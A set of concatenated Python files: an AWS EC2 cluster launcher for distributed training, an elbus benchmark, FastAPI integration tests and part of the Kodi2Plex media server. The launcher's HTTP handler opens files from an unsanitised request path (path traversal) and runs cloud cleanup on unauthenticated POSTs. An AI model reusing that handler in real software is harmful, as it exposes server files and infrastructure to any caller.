subnet = ec2client.describe_subnets(Filters=[{
"Name": "tag:Task_name",
"Values": [task_name]
}])
if len(subnet["Subnets"]) > 0:
ec2client.delete_subnet(SubnetId=subnet["Subnets"][0]["SubnetId"])
# no subnet delete waiter, just leave it.
logging.info("Clearnup done")
return
def kickoff_pserver(host, pserver_endpoints_str):
try:
ssh_key = paramiko.RSAKey.from_private_key_file(args.pem_path)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname=host, username="ubuntu", pkey=ssh_key)
cmd = (script_to_str(args.pserver_bash_file)).format(
PSERVER_HOSTS=pserver_endpoints_str,
DOCKER_IMAGE=args.docker_image,
PSERVER_PORT=args.pserver_port,
TASK_NAME=args.task_name,
COMMAND=parse_command(args.pserver_command, {"device": "CPU"}),
TRAINER_COUNT=args.trainer_count,
TRAINER_INDEX=0,
# there is no way to use 0.0.0.0:port to start pserver
# has to docker --network="host" with host ip to make this work
SERVER_ENDPOINT=host + ":" + str(args.pserver_port),
MASTER_ENDPOINT=args.master_server_ip + ":" +
str(args.master_server_port))
logging.info(cmd)
stdin, stdout, stderr = ssh_client.exec_command(command=cmd)
stdout_thread = threading.Thread(
target=log_to_file, args=(
stdout,
"pserver_" + host + ".log", ))
stderr_thread = threading.Thread(
target=log_to_file, args=(
stderr,
"pserver_" + host + "_err.log", ))
stdout_thread.start()
stderr_thread.start()
stdout_thread.join()
stderr_thread.join()
return_code = stdout.channel.recv_exit_status()
logging.info(return_code)
if return_code != 0:
raise Exception("Error while kicking off pserver training process")
except Exception:
logging.exception("Error while kicking off pserver training process")
cleanup(args.task_name)
finally:
ssh_client.close()
def init_args():
if not args.task_name:
args.task_name = generate_task_name()
logging.info("task name generated %s" % (args.task_name))
if not args.pem_path:
args.pem_path = os.path.expanduser("~") + "/" + args.key_name + ".pem"
if args.security_group_id:
args.security_group_ids = (args.security_group_id, )
args.trainers_job_done_count = 0
def create_cluster():
if not args.subnet_id:
logging.info("creating subnet for this task")
args.subnet_id = create_subnet()
logging.info("subnet %s created" % (args.subnet_id))
logging.info("creating pservers")
pserver_create_response = create_pservers()
logging.info("pserver created, collecting pserver ips")
pserver_endpoints = []
for pserver in pserver_create_response:
pserver_endpoints.append(pserver["NetworkInterfaces"][0][
"PrivateIpAddress"] + ":" + args.pserver_port)
pserver_endpoints_str = ",".join(pserver_endpoints)
logging.info("kicking off pserver training process")
pserver_threads = []
for pserver in pserver_create_response:
pserver_thread = threading.Thread(
target=kickoff_pserver,
args=(pserver["PrivateIpAddress"], pserver_endpoints_str))
pserver_thread.start()
pserver_threads.append(pserver_thread)
logging.info("all pserver training process started")
logging.info("creating trainers and kicking off trainer training process")
create_trainers(
kickoff_cmd=script_to_str(args.trainer_bash_file),
pserver_endpoints_str=pserver_endpoints_str)
for pserver_thread in pserver_threads:
pserver_thread.join()
logging.info("all process ended")
def start_server(args):
class S(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/text')
self.end_headers()
def do_HEAD(self):
self._set_headers()
def do_404(self):
self.send_response(404)
self.send_header('Content-type', 'text/text')
self.end_headers()
logging.info("Received invalid GET request" + self.path)
self.wfile.write("NO ACTION FOUND")
def do_GET(self):
request_path = self.path
if request_path == "/status" or request_path == "/master_logs":
self._set_headers()
logging.info("Received request to return status")
with open(args.log_path + "master.log", "r") as logfile:
self.wfile.write(logfile.read().strip())
elif request_path == "/list_logs" or request_path == "/logs":
self._set_headers()
self.wfile.write("\n".join(log_files))
elif "/log/" in request_path:
self._set_headers()
log_file_path = request_path.replace("/log/", "")
logging.info("requesting log file path is" + args.log_path +
log_file_path)
with open(args.log_path + log_file_path, "r") as logfile:
self.wfile.write(logfile.read().strip())
else:
self.do_404()
def do_POST(self):
request_path = self.path
if request_path == "/save_data":
self._set_headers()
logging.info("Received request to save data")
self.wfile.write("DATA SAVED!")
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if args.task_name:
with open(args.task_name + ".txt", "a") as text_file:
text_file.write(post_data + "\n")
elif request_path == "/cleanup":
self._set_headers()
logging.info("Received request to cleanup cluster")
args.no_clean_up = False
cleanup(args.task_name)
self.wfile.write("cleanup in progress")
else:
self.do_404()
server_address = ('', args.master_server_port)
httpd = HTTPServer(server_address, S)
logging.info("HTTP server is starting")
httpd.serve_forever()
def print_arguments():
logging.info('----------- Configuration Arguments -----------')
for arg, value in sorted(vars(args).iteritems()):
logging.info('%s: %s' % (arg, value))
logging.info('------------------------------------------------')
if __name__ == "__main__":
print_arguments()
if args.action == "create":
logging.info("going to create cluster")
if not args.key_name or not args.security_group_id:
raise ValueError("key_name and security_group_id are required")
init_args()
create_cluster()
elif args.action == "cleanup":
logging.info("going to cleanup cluster")
if not args.task_name:
raise ValueError("task_name is required")
cleanup(args.task_name)
elif args.action == "serve":
# serve mode
if not args.master_server_ip:
raise ValueError(
"No master server ip set, please run with --action create")
logging.info("going to start serve and create cluster")
init_args()
logging.info("starting server in another thread")
server_thread = threading.Thread(target=start_server, args=(args, ))
server_thread.start()
create_cluster()
server_thread.join()
elif args.action == "test":
start_server(args)
|
test.py | import sys
sys.path.insert(0, '..')
import elbus
import threading
import time
import random
from tqdm import tqdm
iters = 100_000
workers = 1
cnt = 0
def on_frame(frame):
global cnt
cnt += 1
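# Note: cnt is bumped both here for any incoming frames and after each confirmed
# send in test() below, so both paths feed the shared progress counter.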
def test(w, iters):
try:
global cnt
payload = b'\x01' * 1024
name = f'test{random.randint(0, 1_000_000)}-{w}'
path = '/tmp/elbus.sock'
# path = 'localhost:9924'
bus = elbus.client.Client(path, name)
bus.on_frame = on_frame
bus.connect()
print(f'Connected to {path}')
for i in range(iters):
frame = elbus.client.Frame(payload, qos=3)
b = bus.send('y', frame)
if not b.wait_completed(timeout=1):
raise TimeoutError
cnt += 1
except Exception as e:
import traceback
traceback.print_exc()
started = time.perf_counter()
for w in range(workers):
threading.Thread(target=test, args=(w, int(iters / workers))).start()
time.sleep(0.1)
with tqdm(total=iters) as pbar:
prev = 0
while cnt < iters:
time.sleep(0.01)
pbar.update(cnt - prev)
prev = cnt
pbar.update(iters)
elapsed = time.perf_counter() - started
speed = round(iters / elapsed)
print(f'{round(1_000_000/speed)} us per iter')
|
configs.py | from multiprocessing import Process
import unittest
import requests
import uvicorn
import time
# local import
from ..IO import BASE_URL, URLs, INPUTS_CONFIGS, OUTPUTS_CONFIGS
from ..settings import create_users, create_configs
from app.main import app
class IntegrationTests_Configs(unittest.TestCase):
"""
Integration tests class using unittest (Configs endpoints)
"""
def __init__(self, *args, **kwargs):
"""
self.inputs: dict (standard tests inputs from input.py @tests dir)
self.outputs: dict (expected tests outputs)
self.urls: dict (base urls)
"""
super(IntegrationTests_Configs, self).__init__(*args, **kwargs)
self.inputs = INPUTS_CONFIGS()
self.outputs = OUTPUTS_CONFIGS()
self.urls = URLs(True)
@classmethod
def setUpClass(cls):
# check for tests users
create_users()
# create tests configs
create_configs()
# start the app
IntegrationTests_Configs.proc = Process(
target=cls.run_app, args=(), daemon=True
)
IntegrationTests_Configs.proc.start()
base_url = BASE_URL()
# wait the app
while True:
try:
req = requests.get(base_url + "/docs")
if req.status_code == 200:
break
except Exception:  # app not reachable yet, retry shortly
time.sleep(2.5)
@classmethod
def tearDownClass(cls):
# stop the app
IntegrationTests_Configs.proc.terminate()
IntegrationTests_Configs.proc.join(2.5)
@classmethod
def run_app(cls):
"""
run the app using uvicorn
"""
uvicorn.run(app=app, host="127.0.0.1", port=5057)
# [get_access_token : GET : /token]
def test_00_create_access_token_for_admin_and_user2(self):
res1 = requests.post(
self.urls["get_access_token"],
headers=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"headers"
],
data=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"admin"
],
)
res2 = requests.post(
self.urls["get_access_token"],
headers=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"headers"
],
data=self.inputs["test_00_create_access_token_for_admin_and_user2"][
"user2"
],
)
assert (
res1.status_code
== self.outputs["test_00_create_access_token_for_admin_and_user2"][
"status_code"
]
)
assert (
res2.status_code
== self.outputs["test_00_create_access_token_for_admin_and_user2"][
"status_code"
]
)
IntegrationTests_Configs.admin_token = res1.json()["access_token"]
IntegrationTests_Configs.user2_token = res2.json()["access_token"]
# [List : GET : /configs]
def test_01_List_success(self):
self.inputs["test_01_List_success"]["headers"]["Authorization"] = (
self.inputs["test_01_List_success"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
self.urls["List"], headers=self.inputs["test_01_List_success"]["headers"]
)
assert res.status_code == self.outputs["test_01_List_success"]["status_code"]
assert res.json() == self.outputs["test_01_List_success"]["json"]
# [List : GET : /configs]
def test_02_List_success_owner(self):
self.inputs["test_02_List_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_02_List_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
self.urls["List"]
+ "?owner="
+ self.inputs["test_02_List_success_owner"]["owner"],
headers=self.inputs["test_02_List_success_owner"]["headers"],
)
assert (
res.status_code == self.outputs["test_02_List_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_02_List_success_owner"]["json"]
# [List : GET : /configs]
def test_03_List_401(self):
self.inputs["test_03_List_401"]["headers"]["Authorization"] = (
self.inputs["test_03_List_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.get(
self.urls["List"] + "?owner=" + self.inputs["test_03_List_401"]["owner"],
headers=self.inputs["test_03_List_401"]["headers"],
)
assert res.status_code == self.outputs["test_03_List_401"]["status_code"]
assert res.json() == self.outputs["test_03_List_401"]["json"]
# [Create : POST : /configs]
def test_04_Create_success(self):
self.inputs["test_04_Create_success"]["headers"]["Authorization"] = (
self.inputs["test_04_Create_success"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.post(
self.urls["Create"],
headers=self.inputs["test_04_Create_success"]["headers"],
json=self.inputs["test_04_Create_success"]["json"],
)
assert res.status_code == self.outputs["test_04_Create_success"]["status_code"]
assert res.json() == self.outputs["test_04_Create_success"]["json"]
# [Create : POST : /configs]
def test_05_Create_400(self):
self.inputs["test_05_Create_400"]["headers"]["Authorization"] = (
self.inputs["test_05_Create_400"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.post(
self.urls["Create"],
headers=self.inputs["test_05_Create_400"]["headers"],
json=self.inputs["test_05_Create_400"]["json"],
)
assert res.status_code == self.outputs["test_05_Create_400"]["status_code"]
assert res.json() == self.outputs["test_05_Create_400"]["json"]
# [Get : GET : /configs/{name}]
def test_06_Get_success(self):
self.inputs["test_06_Get_success"]["headers"]["Authorization"] = (
self.inputs["test_06_Get_success"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(self.urls["Get"] % self.inputs["test_06_Get_success"]["name"]),
headers=self.inputs["test_06_Get_success"]["headers"],
)
assert res.status_code == self.outputs["test_06_Get_success"]["status_code"]
assert res.json() == self.outputs["test_06_Get_success"]["json"]
# [Get : GET : /configs/{name}]
def test_07_Get_success_owner(self):
self.inputs["test_07_Get_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_07_Get_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Get"] % (self.inputs["test_07_Get_success_owner"]["name"])
+ "?owner="
+ self.inputs["test_07_Get_success_owner"]["owner"]
),
headers=self.inputs["test_07_Get_success_owner"]["headers"],
)
assert (
res.status_code == self.outputs["test_07_Get_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_07_Get_success_owner"]["json"]
# [Get : GET : /configs/{name}]
def test_08_Get_401(self):
self.inputs["test_08_Get_401"]["headers"]["Authorization"] = (
self.inputs["test_08_Get_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.get(
(
self.urls["Get"] % (self.inputs["test_08_Get_401"]["name"])
+ "?owner="
+ self.inputs["test_07_Get_success_owner"]["owner"]
),
headers=self.inputs["test_08_Get_401"]["headers"],
)
assert res.status_code == self.outputs["test_08_Get_401"]["status_code"]
assert res.json() == self.outputs["test_08_Get_401"]["json"]
# [Get : GET : /configs/{name}]
def test_09_Get_404(self):
self.inputs["test_09_Get_404"]["headers"]["Authorization"] = (
self.inputs["test_09_Get_404"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Get"] % (self.inputs["test_09_Get_404"]["name"])
+ "?owner="
+ self.inputs["test_07_Get_success_owner"]["owner"]
),
headers=self.inputs["test_09_Get_404"]["headers"],
)
assert res.status_code == self.outputs["test_09_Get_404"]["status_code"]
assert res.json() == self.outputs["test_09_Get_404"]["json"]
# [Update : PUT : /configs/{name}]
def test_10_Update_success(self):
self.inputs["test_10_Update_success"]["headers"]["Authorization"] = (
self.inputs["test_10_Update_success"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.put(
(self.urls["Update"] % self.inputs["test_10_Update_success"]["name"]),
headers=self.inputs["test_10_Update_success"]["headers"],
json=self.inputs["test_10_Update_success"]["json"],
)
assert res.status_code == self.outputs["test_10_Update_success"]["status_code"]
assert res.json() == self.outputs["test_10_Update_success"]["json"]
# [Update : PUT : /configs/{name}]
def test_11_Update_success_owner(self):
self.inputs["test_11_Update_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_11_Update_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.put(
(self.urls["Update"] % self.inputs["test_11_Update_success_owner"]["name"])
+ "?owner="
+ self.inputs["test_11_Update_success_owner"]["owner"],
headers=self.inputs["test_11_Update_success_owner"]["headers"],
json=self.inputs["test_11_Update_success_owner"]["json"],
)
assert (
res.status_code
== self.outputs["test_11_Update_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_11_Update_success_owner"]["json"]
# [Update : PUT : /configs/{name}]
def test_12_Update_401(self):
self.inputs["test_12_Update_401"]["headers"]["Authorization"] = (
self.inputs["test_12_Update_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.put(
(
self.urls["Update"] % (self.inputs["test_12_Update_401"]["name"])
+ "?owner="
+ self.inputs["test_12_Update_401"]["owner"]
),
headers=self.inputs["test_12_Update_401"]["headers"],
json=self.inputs["test_12_Update_401"]["json"],
)
assert res.status_code == self.outputs["test_12_Update_401"]["status_code"]
assert res.json() == self.outputs["test_12_Update_401"]["json"]
# [Update : PUT : /configs/{name}]
def test_13_Update_404(self):
self.inputs["test_13_Update_404"]["headers"]["Authorization"] = (
self.inputs["test_13_Update_404"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.put(
(
self.urls["Update"] % (self.inputs["test_13_Update_404"]["name"])
+ "?owner="
+ self.inputs["test_13_Update_404"]["owner"]
),
headers=self.inputs["test_13_Update_404"]["headers"],
json=self.inputs["test_13_Update_404"]["json"],
)
assert res.status_code == self.outputs["test_13_Update_404"]["status_code"]
assert res.json() == self.outputs["test_13_Update_404"]["json"]
# [Delete : Delete : /configs/{name}]
def test_14_Delete_success(self):
self.inputs["test_14_Delete_success"]["headers"]["Authorization"] = (
self.inputs["test_14_Delete_success"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.delete(
(self.urls["Delete"] % self.inputs["test_14_Delete_success"]["name"]),
headers=self.inputs["test_14_Delete_success"]["headers"],
)
assert res.status_code == self.outputs["test_14_Delete_success"]["status_code"]
assert res.json() == self.outputs["test_14_Delete_success"]["json"]
# [Delete : Delete : /configs/{name}]
def test_15_Delete_success_owner(self):
self.inputs["test_15_Delete_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_15_Delete_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.delete(
(self.urls["Delete"] % self.inputs["test_15_Delete_success_owner"]["name"])
+ "?owner="
+ self.inputs["test_15_Delete_success_owner"]["owner"],
headers=self.inputs["test_15_Delete_success_owner"]["headers"],
)
assert (
res.status_code
== self.outputs["test_15_Delete_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_15_Delete_success_owner"]["json"]
# [Delete : Delete : /configs/{name}]
def test_16_Delete_401(self):
self.inputs["test_16_Delete_401"]["headers"]["Authorization"] = (
self.inputs["test_16_Delete_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.delete(
(
self.urls["Delete"] % (self.inputs["test_16_Delete_401"]["name"])
+ "?owner="
+ self.inputs["test_16_Delete_401"]["owner"]
),
headers=self.inputs["test_16_Delete_401"]["headers"],
)
assert res.status_code == self.outputs["test_16_Delete_401"]["status_code"]
assert res.json() == self.outputs["test_16_Delete_401"]["json"]
# [Delete : Delete : /configs/{name}]
def test_17_Delete_404(self):
self.inputs["test_17_Delete_404"]["headers"]["Authorization"] = (
self.inputs["test_17_Delete_404"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.delete(
(
self.urls["Delete"] % (self.inputs["test_17_Delete_404"]["name"])
+ "?owner="
+ self.inputs["test_17_Delete_404"]["owner"]
),
headers=self.inputs["test_17_Delete_404"]["headers"],
)
assert res.status_code == self.outputs["test_17_Delete_404"]["status_code"]
assert res.json() == self.outputs["test_17_Delete_404"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_18_Query_success(self):
self.inputs["test_18_Query_success"]["headers"]["Authorization"] = (
self.inputs["test_18_Query_success"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_18_Query_success"]["key"],
self.inputs["test_18_Query_success"]["value"],
)
+ "?all="
+ self.inputs["test_18_Query_success"]["all"]
),
headers=self.inputs["test_18_Query_success"]["headers"],
)
assert res.status_code == self.outputs["test_18_Query_success"]["status_code"]
assert res.json() == self.outputs["test_18_Query_success"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_19_Query_success_all(self):
self.inputs["test_19_Query_success_all"]["headers"]["Authorization"] = (
self.inputs["test_19_Query_success_all"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_19_Query_success_all"]["key"],
self.inputs["test_19_Query_success_all"]["value"],
)
+ "?all="
+ self.inputs["test_19_Query_success_all"]["all"]
),
headers=self.inputs["test_19_Query_success_all"]["headers"],
)
assert (
res.status_code == self.outputs["test_19_Query_success_all"]["status_code"]
)
assert res.json() == self.outputs["test_19_Query_success_all"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_20_Query_success_owner(self):
self.inputs["test_20_Query_success_owner"]["headers"]["Authorization"] = (
self.inputs["test_20_Query_success_owner"]["headers"]["Authorization"]
% self.__class__.admin_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_20_Query_success_owner"]["key"],
self.inputs["test_20_Query_success_owner"]["value"],
)
)
+ "?all="
+ self.inputs["test_20_Query_success_owner"]["all"]
+ "&owner="
+ self.inputs["test_20_Query_success_owner"]["owner"],
headers=self.inputs["test_20_Query_success_owner"]["headers"],
)
assert (
res.status_code
== self.outputs["test_20_Query_success_owner"]["status_code"]
)
assert res.json() == self.outputs["test_20_Query_success_owner"]["json"]
# [Query : GET : /search/metadata.{key}={value}]
def test_21_Query_401(self):
self.inputs["test_21_Query_401"]["headers"]["Authorization"] = (
self.inputs["test_21_Query_401"]["headers"]["Authorization"]
% self.__class__.user2_token
)
res = requests.get(
(
self.urls["Query"]
% (
self.inputs["test_21_Query_401"]["key"],
self.inputs["test_21_Query_401"]["value"],
)
+ "?all="
+ self.inputs["test_21_Query_401"]["all"]
),
headers=self.inputs["test_21_Query_401"]["headers"],
)
assert res.status_code == self.outputs["test_21_Query_401"]["status_code"]
assert res.json() == self.outputs["test_21_Query_401"]["json"]
|
kodi2plex.py | """
Kodi2Plex
Simple server to access a Kodi instance from Plex clients
"""
import os
import sys
import json
import time
import struct
import socket
import pprint
import random
import logging
import asyncio
import argparse
import threading
import traceback
import collections
import http.server
import socketserver
import urllib.request
import xml.dom.minidom
import xml.etree.ElementTree
import aiohttp
import aiohttp.web
video_codec_map = {"avc1": "h264", "hev1": "hevc", "hevc": "hevc"}
def _xml_prettify(elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = xml.etree.ElementTree.tostring(elem)
reparsed = xml.dom.minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
async def kodi_request(app, method, params):
"""
Sends a JSON formatted message to the server
returns the result as dictionary (from json response)
"""
# create the request
payload = {
"method": method,
"params": params,
"jsonrpc": "2.0",
"id": app["kodi_jsonrpc_counter"],
}
# increase the message counter
app["kodi_jsonrpc_counter"] += 1
if app["debug"]:
logger.debug("Sending to %s\nDATA:\n%s", app["kodi_url"], pprint.pformat(payload))
# fire up the request
kodi_response = await app["client_session"].post(app["kodi_url"],
data=json.dumps(payload).encode("utf8"),
headers={'content-type': 'application/json'})
kodi_json = await kodi_response.json()
if app["debug"]:
logger.debug("Result:\n%s", pprint.pformat(kodi_json))
return kodi_json
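# A minimal usage sketch for kodi_request (illustrative only; "app" is assumed to be the
# aiohttp application dict configured in __main__ below):
#
#     movies = await kodi_request(app, "VideoLibrary.GetMovies",
#                                 {"properties": ["year", "file"]})
#     print(movies["result"]["limits"]["total"])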
async def init_kodi(app):
pass
# json_data = await app["client_session"].get(app["kodi_url"])
# json_data = await json_data.json()
# # json_data["methods"] = []
# # json_data["notifications"] = []
# # json_data["types"] = []
# pprint.pprint(json_data["methods"]["VideoLibrary.GetEpisodes"])
# pprint.pprint(json_data["types"]["List.Sort"])
def gdm_broadcast(gdm_socket, kodi2plex_app):
"""
Function to send response for GDM requests from
Plex clients
"""
while gdm_socket.fileno() != -1:
logger.debug('GDM: waiting to receive')
data, address = gdm_socket.recvfrom(1024)
logger.debug('received %s bytes from %s', len(data), address)
# discard message if header is not in right format
if data == b'M-SEARCH * HTTP/1.1\r\n\r\n':
mxpos = data.find(b'MX:')
maxdelay = int(data[mxpos+4]) % 5 # Max value of this field is 5
time.sleep(random.randrange(0, maxdelay+1, 1)) # wait for random 0-MX time until sending out responses using unicast.
logger.info('Sending M Search response to - %s', address)
# response as string
response_message = """HTTP/1.1 200 OK\r
Content-Type: plex/media-server\r
Name: %s\r
Port: 32400\r
Resource-Identifier: 23f2d6867befb9c26f7b5f366d4dd84e9b2294c9\r
Updated-At: 1466340239\r
Version: 0.9.16.6.1993-5089475\r
\r\n""" % kodi2plex_app["server_ip"]
logger.debug("GDM send: %s", response_message)
gdm_socket.sendto(response_message.encode("utf8"), address)
else:
logger.warning('received wrong M-SEARCH')
time.sleep(5)
def IndexMiddleware(index='index.html'):
"""Middleware to serve index files (e.g. index.html) when static directories are requested.
Usage:
::
from aiohttp import web
from aiohttp_index import IndexMiddleware
app = web.Application(middlewares=[IndexMiddleware()])
app.router.add_static('/', 'static')
``app`` will now serve ``static/index.html`` when ``/`` is requested.
:param str index: The name of a directory's index file.
:returns: The middleware factory.
:rtype: function
"""
async def middleware_factory(app, handler):
"""Middleware factory method.
:type app: aiohttp.web.Application
:type handler: function
:returns: The retry handler.
:rtype: function
"""
async def index_handler(request):
"""Handler to serve index files (index.html) for static directories.
:type request: aiohttp.web.Request
:returns: The result of the next handler in the chain.
:rtype: aiohttp.web.Response
"""
try:
filename = request.match_info['filename']
if not filename:
filename = index
if filename.endswith('/'):
filename += index
request.match_info['filename'] = filename
except KeyError:
pass
return await handler(request)
return index_handler
return middleware_factory
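# Build the Plex <Media>/<Part>/<Stream> hierarchy for a movie or episode from the KODI
# stream details and append it to the given <Video> node, together with Director/Genre/
# Writer/Country/Role tags where available.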
async def extract_kodi_info(app, video_node, kodi_info, stream_id):
part_node = None
try:
video_codec = kodi_info["streamdetails"]["video"][0]["codec"]
media_node = xml.etree.ElementTree.Element("Media",
attrib={"duration": str(kodi_info["runtime"] * 1000),
"width": str(kodi_info["streamdetails"]["video"][0]["width"]),
"height": str(kodi_info["streamdetails"]["video"][0]["height"]),
"aspectRatio": str(kodi_info["streamdetails"]["video"][0]["aspect"]),
"audioChannels": str(kodi_info["streamdetails"]["audio"][0]["channels"]),
"container": "mp4",
"optimizedForStreaming": "1",
"audioCodec": kodi_info["streamdetails"]["audio"][0]["codec"],
"videoCodec": video_codec_map.get(video_codec, video_codec)})
video_node.append(media_node)
download_info = await kodi_request(app, "Files.PrepareDownload", [kodi_info["file"]])
download_url = app["kodi"] + download_info['result']['details']['path']
part_node = xml.etree.ElementTree.Element("Part",
attrib={"accessible": "1",
"id": stream_id,
"container": "mp4",
"optimizedForStreaming": "1",
"key": download_url})
media_node.append(part_node)
except Exception:
logger.error("Error while getting stream details: %s", traceback.format_exc())
if part_node is not None:
stream_counter = 1
default_node = True
for video in kodi_info["streamdetails"]["video"]:
stream_node = xml.etree.ElementTree.Element("Stream", attrib={"streamType": "1",
"id": str(stream_counter),
"codec": video_codec_map[video["codec"]],
"codecID": video_codec_map[video["codec"]],
"duration": str(video["duration"] * 1000),
"width": str(video["width"]),
"height": str(video["height"]),
"streamIdentifier": str(stream_counter + 1),
"index": str(stream_counter)})
if default_node:
stream_node.attrib["default"] = "1"
default_node = False
part_node.append(stream_node)
stream_counter += 1
default_node = True
for audio in kodi_info["streamdetails"]["audio"]:
stream_node = xml.etree.ElementTree.Element("Stream", attrib={"streamType": "2",
"id": str(stream_counter),
"codec": audio["codec"],
"language": audio["language"],
"languageCode": audio["language"],
"channels": str(audio["channels"]),
"streamIdentifier": str(stream_counter + 1),
"index": str(stream_counter)})
if default_node:
stream_node.attrib["default"] = "1"
default_node = False
part_node.append(stream_node)
stream_counter += 1
for director in kodi_info["director"]:
director_node = xml.etree.ElementTree.Element("Director", attrib={"tag": director})
video_node.append(director_node)
if "genre" in kodi_info:
for genre in kodi_info["genre"]:
genre_node = xml.etree.ElementTree.Element("Genre", attrib={"tag": genre})
video_node.append(genre_node)
for writer in kodi_info["writer"]:
writer_node = xml.etree.ElementTree.Element("Writer", attrib={"tag": writer})
video_node.append(writer_node)
if "genre" in kodi_info:
for country in kodi_info["country"]:
country_node = xml.etree.ElementTree.Element("Country", attrib={"tag": country})
video_node.append(country_node)
for cast in kodi_info["cast"]:
cast_node = xml.etree.ElementTree.Element("Role", attrib={"tag": cast["name"],
"role": cast["role"]})
video_node.append(cast_node)
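# Fetch the full movie details from KODI and convert them into a single Plex <Video> node,
# including the media and stream information added by extract_kodi_info.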
async def get_movie_node(app, movie_id):
movie_info = await kodi_request(app,
"VideoLibrary.GetMovieDetails",
{"movieid": movie_id,
"properties": ["title",
"genre",
"year",
"rating",
"director",
"trailer",
"tagline",
"plot",
"plotoutline",
"originaltitle",
"lastplayed",
"playcount",
"writer",
"studio",
"mpaa",
"cast",
"country",
"imdbnumber",
"runtime",
"set",
"showlink",
"streamdetails",
"top250",
"votes",
"fanart",
"thumbnail",
"file",
"sorttitle",
"resume",
"setid",
"dateadded",
"tag",
"art"]})
movie_info = movie_info["result"]["moviedetails"]
video_node = xml.etree.ElementTree.Element("Video",
attrib={"type": "movie",
"key": "/library/metadata/movie/%d" % movie_id,
"title": movie_info['label'],
"studio": "" if not movie_info['studio'] else movie_info['studio'][0],
"tagline": movie_info['tagline'],
"summary": movie_info['plot'],
"year": str(movie_info['year']),
"rating": str(movie_info["rating"]),
"art": movie_info["fanart"],
"viewCount": str(movie_info['playcount']),
"viewOffset": str(int(movie_info["resume"]["position"]*1000)),
"duration": str(movie_info["runtime"] * 1000),
"thumb": movie_info['thumbnail']})
await extract_kodi_info(app, video_node, movie_info, str(movie_id))
return video_node
async def get_episode_node(app, episode_id):
episode_info = await kodi_request(app,
"VideoLibrary.GetEpisodeDetails",
[episode_id,
["title", "plot", "votes", "rating", "writer", "firstaired", "playcount",
"runtime", "director", "productioncode", "season", "episode", "originaltitle",
"showtitle", "cast", "streamdetails", "lastplayed", "fanart", "thumbnail", "file",
"resume", "tvshowid", "dateadded", "uniqueid", "art"]])
episode_info = episode_info["result"]["episodedetails"]
video_node = xml.etree.ElementTree.Element("Video",
attrib={"type": "episode",
"key": "/library/metadata/episode/%d" % episode_id,
"title": episode_info['label'],
"summary": episode_info['plot'],
"rating": str(episode_info["rating"]),
"art": episode_info["fanart"],
"duration": str(episode_info["runtime"] * 1000),
"viewCount": str(episode_info['playcount']),
"viewOffset": str(int(episode_info["resume"]["position"]*1000)),
"thumb": episode_info['thumbnail']})
await extract_kodi_info(app, video_node, episode_info, "episode%d" % episode_id)
return video_node
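# Root document of the emulated Plex server: advertises its identity, transcoder
# capabilities and the standard top-level directories that Plex clients expect.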
async def get_root(request):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
root.attrib["allowMediaDeletion"] = "1"
root.attrib["friendlyName"] = "Kodi2Plex"
root.attrib["machineIdentifier"] = "23f2d6867befb9c26f7b5f366d4dd84e9b2294c9"
root.attrib["myPlex"] = "0"
root.attrib["myPlexMappingState"] = "unknown"
root.attrib["myPlexSigninState"] = "none"
root.attrib["myPlexSubscription"] = "0"
root.attrib["myPlexUsername"] = ""
root.attrib["platform"] = "Linux"
root.attrib["platformVersion"] = " (#3 SMP PREEMPT Wed Nov 19 08:28:34 CET 2014)"
root.attrib["requestParametersInCookie"] = "0"
root.attrib["sync"] = "1"
root.attrib["transcoderActiveVideoSessions"] = "0"
root.attrib["transcoderAudio"] = "1"
root.attrib["transcoderVideo"] = "1"
root.attrib["transcoderVideoBitrates"] = "64,96,208,320,720,1500,2000,3000,4000,8000,10000,12000,20000"
root.attrib["transcoderVideoQualities"] = "0,1,2,3,4,5,6,7,8,9,10,11,12"
root.attrib["transcoderVideoRemuxOnly"] = "1"
root.attrib["transcoderVideoResolutions"] = "128,128,160,240,320,480,768,720,720,1080,1080,1080,1080"
root.attrib["updatedAt"] = "1466340239"
root.attrib["version"] = "0.9.16.6.1993-5089475"
